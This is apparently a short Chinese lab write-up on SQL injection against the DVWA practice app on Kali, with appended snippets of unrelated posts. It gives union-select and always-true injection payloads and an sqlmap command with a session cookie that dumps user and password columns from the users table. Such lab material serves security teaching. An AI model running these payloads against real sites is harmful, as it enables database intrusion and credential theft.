測試環境:dvwa+kail
1、尋找注入點:
1.2、注入點初步測試: 1' union select user, password from users#
1.3、繼續測試:1'or'1'='1
2、使用kail工具測試:
可以看出需要登入,加上cookie:
成功!可看到伺服器配置資訊,繼續拿資料庫資訊:
檢視某資料庫並展示所有表:
檢視某資料庫某錶的所有列:
查詢資料:
查不到需要資訊,修改sqlmap引數:
sqlmap -u "" --cookie="security=low;phpsessid=vp85jg4o3lb509u7ajuecefpd6" --batch --dump -c "user_id,user,password" -t "users" -d "dvwa"
# --dump -c " " -t " " -d " "引數得到---dvwa資料庫---下面的---表users---下面的列(columns)的具體值,即某(些)屬性的具體值
完成!
python爬蟲之利用requests爬取墨跡天氣
import requests from lxml.html import etree import json import time 匯入模組 class mojiweather def city name self 定義乙個輸入城市名稱的函式 cityname str input 輸入城市名稱 ...
python之利用epoll實現http伺服器
usr bin python3.5 coding utf 8 time 18 7 2 下午7 39 author fengwr email fengwenrui1217 163.com file epoll實現http.py 建立epoll物件 epl select.epoll 將tcp sever...
Android之(利用服務實現)
1.啟動模擬器,部署應用 2.利用模擬器控制器傳送簡訊啟動服務 檢視日誌輸出判斷是否成功 清單設定 乙個receiver,乙個service,若干許可權 器服務類 phonelistenerservice package cn.class3g.phonelistener public class p...